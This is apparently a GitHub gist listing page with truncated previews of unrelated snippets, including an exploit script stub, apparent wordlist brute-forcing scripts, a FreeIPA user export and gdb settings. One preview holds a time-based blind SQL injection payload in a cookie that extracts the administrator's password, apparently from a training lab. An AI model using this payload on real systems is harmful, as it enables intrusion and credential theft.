This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Draziw.Button.Mines | |
ag.video_solutions.wedotv | |
ahf.dummynation | |
ai.socialapps.speakmaster | |
air.com.beachbumgammon | |
air.com.freshplanet.games.SongPop2 | |
air.com.gamesys.mobile.slots.jpj | |
air.com.goodgamestudios.empirefourkingdoms | |
air.com.kitchenscramble.goo | |
air.com.lalaplay.rummy45 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Function to download proxies using curl | |
download_proxies() { | |
url=$1 | |
output_file=$2 | |
curl -s "$url" -o "$output_file" | |
} | |
# Function to add a prefix to proxy files |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
import re | |
import sys | |
if len(sys.argv) != 2: | |
print("USAGE: exploit.py <url>") | |
sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, signal, sys, re | |
def read_file(file): | |
content = [] | |
f = open(file, "r") | |
while(True): | |
linea = f.readline().rstrip('\n') | |
content.append(linea) | |
if not linea: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, signal, sys | |
def read_file(file): | |
content = [] | |
f = open(file, "r") | |
while(True): | |
linea = f.readline().rstrip('\n') | |
content.append(linea) | |
if not linea: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, signal, sys, string, random | |
def read_file(file): | |
content = [] | |
f = open(file, "r") | |
while(True): | |
linea = f.readline().rstrip('\n') | |
content.append(linea) | |
if not linea: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import string | |
def blind_sql_injection(url, length): | |
output = '' | |
target = url | |
headers={} | |
chars = string.digits + string.ascii_letters | |
for i in range(1, length+1): | |
base_cookie = "TrackingId=VVXZ5soYhRzXLKyj'%%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,%s,1)='[CHAR]')+THEN+pg_sleep(8)+ELSE+pg_sleep(0)+END+FROM+users--; session=OgsZsGdBcQnsSGqgwH3DXryrixIpLxn9"%(str(i)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
from ipalib import api | |
api.bootstrap(context="exporter", debug=False) | |
api.finalize() | |
api.Backend.rpcclient.connect() | |
users = api.Command["user_find"](all=True)["result"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
from ipalib import api | |
api.bootstrap(context="exporter", debug=False) | |
api.finalize() | |
api.Backend.rpcclient.connect() | |
users = api.Command["user_find"](all=True)["result"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
32bit | |
set disassembly-flavor intel | |
define hook-stop | |
info registers | |
x/24wx $esp | |
x/5i $eip | |
end | |
NewerOlder